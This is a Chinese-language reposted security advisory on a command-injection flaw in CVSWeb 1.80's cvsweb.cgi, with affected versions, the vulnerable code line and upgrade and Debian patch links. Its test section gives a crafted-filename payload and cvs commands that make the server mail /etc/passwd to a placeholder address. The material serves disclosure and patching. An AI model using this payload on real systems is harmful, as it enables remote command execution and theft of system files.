CVSWeb遠(yuǎn)程攻擊漏洞精簡版
此文章主要講述的是CVSWeb遠(yuǎn)程攻擊漏洞,我前兩天在相關(guān)網(wǎng)站看見CVSWeb遠(yuǎn)程攻擊漏洞的資料,覺得挺好,就拿出來供大家分享,以下就是文章的詳細(xì)內(nèi)容介紹,希望會給你帶來一些幫助在此方面。
受影響系統(tǒng):
CVSWeb Developer CVSWeb 1.80
不受影響系統(tǒng):
CVSWeb Developer CVSWeb 1.89
CVSWeb Developer CVSWeb 1.86
描述:
Cvsweb 1.80包含一個安全遠(yuǎn)程攻擊漏洞,如果攻擊者對cvs庫有寫權(quán)限,他就可以遠(yuǎn)程獲得對cvs server的
shell訪問權(quán)限。出問題的代碼在cvsweb.cgi中:
open($fh, "rlog '$filenames' 2>/dev/null |")
攻擊者通過建立一個特殊的文件名,來發(fā)動攻擊。
<* 來源: Wizdumb *>
測試方法:
警 告
以下程序(方法)可能帶有攻擊性,僅供安全研究與教學(xué)之用。使用者風(fēng)險自負(fù)!
攻擊者會首先按照下列步驟操作:
SHELLCODE="';perl -e '\$_=q{mail foo#bar.baz < !etc!passwd}; y:!#:\x2F\x40:; system \$_';'"
touch $SHELLCODE
cvs add $SHELLCODE
cvs commit -m '' $SHELLCODE
然后攻擊者會訪問cvsweb頁面,瀏覽他設(shè)置木馬文件的目錄。這將導(dǎo)致/etc/passwd 文件被
發(fā)送給攻擊者,當(dāng)然攻擊者也可以執(zhí)行其他的命令。
建議:
升級到1.86或者更高版本,下載地址:
http://stud.fh-heilbronn.de/~zeller/cgi/cvsweb.cgi/
[ Debian Linux ]
Debian GNU/Linux 2.1 alias slink
源碼包:
http://security.debian.org/dists/stable/updates/source/cvsweb_109.dsc
MD5 checksum: b1810728310882fb72078674521ee369
http://security.debian.org/dists/stable/updates/source/cvsweb_109.tar.gz
MD5 checksum: 4c42ec3ba7248fc2499cdfaa6ae6b702
以上的相關(guān)內(nèi)容就是對CVSWeb遠(yuǎn)程攻擊漏洞的介紹,望你能有所收獲。
【編輯推薦】